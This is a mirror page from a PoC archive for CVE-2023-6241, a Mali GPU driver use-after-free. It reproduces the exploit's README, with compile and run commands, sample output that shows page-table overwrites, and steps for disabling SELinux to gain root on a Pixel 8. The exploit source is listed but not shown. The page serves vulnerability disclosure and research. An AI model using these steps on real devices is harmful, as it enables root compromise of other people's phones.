Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-6241 PoC — Mali GPU Kernel Driver allows improper GPU memory processing operations

Source
https://github.com/SmileTabLabo/CVE-2023-6241
Associated Vulnerability
Title:Mali GPU Kernel Driver allows improper GPU memory processing operations (CVE-2023-6241)
Description:Use After Free vulnerability in Arm Ltd Midgard GPU Kernel Driver, Arm Ltd Bifrost GPU Kernel Driver, Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user to exploit a software race condition to perform improper memory processing operations. If the system’s memory is carefully prepared by the user, then this in turn cause a use-after-free.This issue affects Midgard GPU Kernel Driver: from r13p0 through r32p0; Bifrost GPU Kernel Driver: from r11p0 through r25p0; Valhall GPU Kernel Driver: from r19p0 through r25p0, from r29p0 through r46p0; Arm 5th Gen GPU Architecture Kernel Driver: from r41p0 through r46p0.
Readme
## Exploit for CVE-2023-6241

The write up can be found [here](https://github.blog/2024-03-18-gaining-kernel-code-execution-on-an-mte-enabled-pixel-8). This is a bug in the Arm Mali kernel driver that I reported in November 2023. The bug can be used to gain arbitrary kernel code execution from the untrusted app domain, which is then used to disable SELinux and gain root.

The exploit is tested on the Google Pixel 8 with the Novmember 2023 patch (`UD1A.231105.004`). It needs to be compiled with OpenCL and linked with the OpenCL library `libGLES_mali.so`. The library can be found in a Pixel 8 device in `vendor/lib64/egl/libGLES_mali.so` and the OpenCL header files can be found in the KhronosGroup's [OpenCL-headers repository](https://github.com/KhronosGroup/OpenCL-Headers). The specific header that I used was the [v2023.04.17](https://github.com/KhronosGroup/OpenCL-Headers/releases/tag/v2023.04.17) version, although other versions should also work. For reference, I used the following command to compile with clang in ndk-26:

```
android-ndk-r26b/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android34-clang -DSHELL -DCL_TARGET_OPENCL_VERSION=300 -I. -L. mali_jit_csf.c mem_read_write.c mempool_utils.c -lGLES_mali -o mali_jit_csf
```

The exploit needs to be linked to `libGLES_mali.so`. This can be done by setting the `LD_LIBRARY_PATH` to `/vendor/lib64/egl`. The exploit rarely fails and even if it does, it does not normally corrupt or crash the system. So in case it fails, it can be rerun. If successful, it should disable SELinux and gain root.

```
shiba:/data/local/tmp $ LD_LIBRARY_PATH=/vendor/lib64/egl ./mali_jit_csf                                     
mali_fd 3
corrupted_jit_addr 6000001000
kernel success
kernel success
queue kernel
jit_grow addr 6000001000
Size after grow: 22f6
Final grow size: 23c7
keep alive jit_addr 60023d1000
Size after free: 21fd, trim_level 6
writing to gpu_va 6002301000
found reused page 5fffef6000, 0
pgd entry found at index 0 40000899bbc443
overwrite addr : 5ffff00b50 b50
overwrite addr : 5fffb00b50 b50
overwrite addr : 5fff900b50 b50
overwrite addr : 5ffff00714 714
overwrite addr : 5fffb00714 714
overwrite addr : 5fff900714 714
result 50
clean up
```

When running the first time, the exploit sometimes stalls after printing the last `overwrite addr` message. If that happens (stalled for more than 10 seconds, though pausing for a few seconds is normal), then simply kill the exploit and rerun it. It should not stall the second time.

To test it with MTE enabled, follow [these instructions](https://outflux.net/blog/archives/2023/10/26/enable-mte-on-pixel-8/) to enable kernel MTE.
File Snapshot

 [4.0K]  /data/pocs/3ef8b12218083ad4f510dad3b6103bb5176b11a3
├── [  15]  CL -> /usr/include/CL
├── [ 320]  firmware_offsets.h
├── [ 45M]  libGLES_mali.so
├── [ 241]  log_utils.h
├── [7.5K]  mali_base_common_kernel.h
├── [ 20K]  mali_base_csf_kernel.h
├── [9.4K]  mali_base_kernel.h
├── [ 14K]  mali_jit_csf.c
├── [ 19K]  mali_kbase_csf_ioctl.h
├── [ 27K]  mali_kbase_ioctl.h
├── [1.8K]  mempool_utils.c
├── [ 504]  mempool_utils.h
├── [8.8K]  mem_read_write.c
├── [1.3K]  mem_read_write.h
└── [2.6K]  README.md

0 directories, 15 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →